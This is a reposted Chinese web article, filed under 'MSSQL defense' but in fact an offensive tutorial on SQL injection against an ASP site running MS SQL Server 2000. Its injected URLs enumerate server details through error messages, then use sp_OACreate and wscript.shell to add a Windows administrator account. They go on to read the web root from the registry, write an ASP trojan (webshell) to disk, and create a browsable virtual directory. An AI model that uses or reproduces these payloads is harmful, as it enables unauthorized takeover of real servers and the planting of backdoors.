当前位置:七道奇文章资讯数据防范MSSQL防范
日期:2011-05-02 15:21:00  来源:本站整理

榨干MS SQL Server 最后一滴血[MSSQL防范]

赞助商链接



  本文“榨干MS SQL Server 最后一滴血[MSSQL防范]”是由七道奇为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:
  风云变更的网络,网络安全让人们不能不关注它.数据库,让我们不得不想起强盛的Oracle,MS SQL.微软的漏洞最多,本日就用SQL INJECTION来让MS SQL为我们好好的工作.

  以下(利用一出名网站作为测试点),相信大家对SQL爆库,爆表,爆字段都已掌握,在这里就不多说这方面了.

  MS SQL内置函数介绍:

  @@VERSION 得到Windows的版本号,MS SQL的版本号,补钉. User_name() 得到当前系统的衔接用户 Db_name() 得到当前衔接的数据库 HOST_NAME() 得到当前主机的名称

  这些信息有助我们对系统举行简单的理解

  好,下面我们就开始吧!

  语句:

http://www.xxx.com/list.ASP?classid=1'

  返复书息:

Microsoft OLE DB Provider for sql server 错误 '80040e14' 字符串 ' Order By Id DESC' 之前有未闭合的引号. /list.asp,行290

  从这里未闭合的引号("’"),我们可以肯定存在SQL INJECTION.发目前漏洞当然接着走了,操纵以上介绍的函数为我们工作了:

  语句:

http://www.xxx.com/list.asp?classid=1 and 0<>(select @@version)

  返回:

Microsoft OLE DB Provider for SQL Server 错误 '80040e07' 将 nvarchar 值 'Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4) ' 转换为数据范例为 int 的列时发生语法错误. /list.asp,行290

  相关的信息出来了,MS SERVER ADVANCED SERVER 2000+SP4, SQL 2000+SP3,从MS SQL SERVER 背面的8.00.760可看出是SP3补钉.看了服务器的信息,接下应当理解数据库的权限了:

  语句:

http://www.xxx.com/list.asp?classid=1 and user_name()=’dbo’

  返回: 正常返回的信息

  肯定是权限是DBO,从表面DBO权限的衔接用户常常是触及SYSADMIN服务器角色成员.阐明数据库服务器角色成员组默许是在每个数据库增添一个DBO用户.

  返回原理根1=1,1=2类似..这里只是权限测试,我们也把它爆出来看看:

  语句:

http://www.xxx.com/list.asp?classid=1 and 0<>(select user_name())

  返回:

Microsoft OLE DB Provider for SQL Server 错误 '80040e07' 将 nvarchar 值 'dbo' 转换为数据范例为 int 的列时发生语法错误. /list.asp,行290

  阐明衔接数据库的用户权限很高,可以肯定是服务器角色组中的成员.

  语句:http://www.xxx.com/list.asp?classid=1 and 0<>(select db_name())—返回:Microsoft OLE DB Provider for SQL Server 错误 '80040e07' 将 nvarchar 值 'GameIMGSys' 转换为数据范例为 int 的列时发生语法错误. /list.asp,行290

  这样便可以爆出当前的数据库.得到这么高权限的数据库衔接成员,我们当然想直接得到WEBSHELL,或是直接拿到NT ADMIN.NT ADMIN取决于当前服务器的配置,假如配置不公道的服务器,我们要直接拿NT ADMIN,拿NT ADMIN就要用到:

  MSSQL内置存储历程:

  sp_OACreate (通过它,危害很得更大,但是需求有SYSADMINS权限才大概利用) sp_OAGetErrorInfo sp_OAGetProperty sp_OAMethod sp_OASetProperty sp_SetPropertysp_OAStop

  由于MS SQL一次可以履行多语句,使得我们有机会利用更多的语句.

  语句:

http://www.xxx.com/list.asp?classid=1; DECLARE @shell INT EXEC SP_OACREATE 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user cntest chinatest /add'

  正常返回.(提醒:假如主机上shell存在的话那将在服务器上成立一个cntest的用户)

  成立用户了,语句后再加个net localgroup administrators cntest /add加到管理组中. 假如对方的机子开着3389端口,或IPC的话,那接下来的事,就不用我多说了.

  碰到专业型主机,只开一个80端口,那应当怎么办呢?当然,我们还是大概拿到WEBSHELL,再渐渐浸透的.

  由于权限高,我们大概先建表,写入ASP木马的数据再通过MAKEWEBTASK,得到WEBSEHLL.手工写入的程序太过于繁锁,上传WEBSHELL最大的问题还是网页目录,目前网上已经有现成的工具通过BACKUP,和MASKWEBTASK的工具得到WEBSHELL了.以下举荐,获得网页途径(通过存储历程到达对注册表的读取):

  操纵内置存储历程 xp_regread(读取注册表键值,权限public):

  语句:

http://www.xxx.com/list.asp?classid=1;CREATE TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(20) exec master..xp_regread @rootkey='HKEY_LOCAL_MacHINE', @key='SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\', @value_name='/', values=@test OUTPUT insert into paths(path) values(@test)

  IIS的默许途径的在注册表中HKEY_LOCAL_MACHINE\ SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\

  操纵爆字段将数据库的值读出来:

  语句:

http://www.xxx.com/list.asp?classid=1 and 0<>(select top 1 paths from newtable)

  返回:

Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]将 varchar 值 'E:\www,,201' 转换为数据范例为 int 的列时发生语法错误.

  这阐明网页目录在E:\www,接下来也可以操纵FSO直接写入ASP木马(提醒必须拥用SYSADMIN权限才可以利用FSO和FSO开入的前提下) :

  语句:

http://www.xxx.com/list.asp?class=1;
declare%20@o%20int,%20@f%20int,%20@t%20int,%20@ret%20int%20exec%20sp_oacreate%20'scripting.filesystemobject',
%20@o%20out%20exec%20sp_oamethod%20@o,%20'createtextfile',%20@f%20out,%20'e:\www\test.asp',
1%20exec%20@ret%20=%20sp_oamethod%20@f,%20'writeline',%20NULL,%20'On Error Resume Next'

  在E:\WWW下成立一个test.asp并写入On Error Resume next语句:

http://www.xxx.com/list.asp?classid=1;
declare%20@o%20int,%20@f%20int,%20@t%20int,%20@ret%20int%20exec%20sp_oacreate%20'scripting.filesystemobject',
%20@o%20out%20exec%20sp_oamethod%20@o,%20'opentextfile',
%20@f%20out,%20'e:\www\test.asp',8%20exec%20@ret%20=%20sp_oamethod%20@f,%20'writeline',%20NULL,%20'asp horse '

  在E:\WWW\test.asp增添一行记录,记录为asp horse, 整个完好木马大概这样写入.(%百分号要用%25替换写入).假如得不到网页目录,怎么办呢?前提你要猜到网站能否利用默许WEB,大概利用域名作为WEB.

declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL,’ cscript.exe c:\inetpub\wwwroot\mkwebdir.VBs -w "默许 Web 站点" -v "e","e:\"’

  在默许的WEB站点下成立一个虚拟目录E,指向E:盘下.

declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL,’ cscript.exe c:\inetpub\wwwroot\chAccess.vbs -a w3svc/1/ROOT/e +browse’

  给虚拟目录e加上浏览属性不错吧.给自己开虚拟服务.想那些网页目录途径,头都快破了.这下给自己一个天开眼了.那传WEBSHELL操纵MS SQL为我们的工作告了一段落了,接下来工作应当由你来了.   以上是“榨干MS SQL Server 最后一滴血[MSSQL防范]”的内容,如果你对以上该文章内容感兴趣,你可以看看七道奇为您推荐以下文章:
  • 榨干MS SQL Server 最后一滴血
  • 本文地址: 与您的QQ/BBS好友分享!
    • 好的评价 如果您觉得此文章好,就请您
        0%(0)
    • 差的评价 如果您觉得此文章差,就请您
        0%(0)

    文章评论评论内容只代表网友观点,与本站立场无关!

       评论摘要(共 0 条,得分 0 分,平均 0 分) 查看完整评论
    Copyright © 2020-2022 www.xiamiku.com. All Rights Reserved .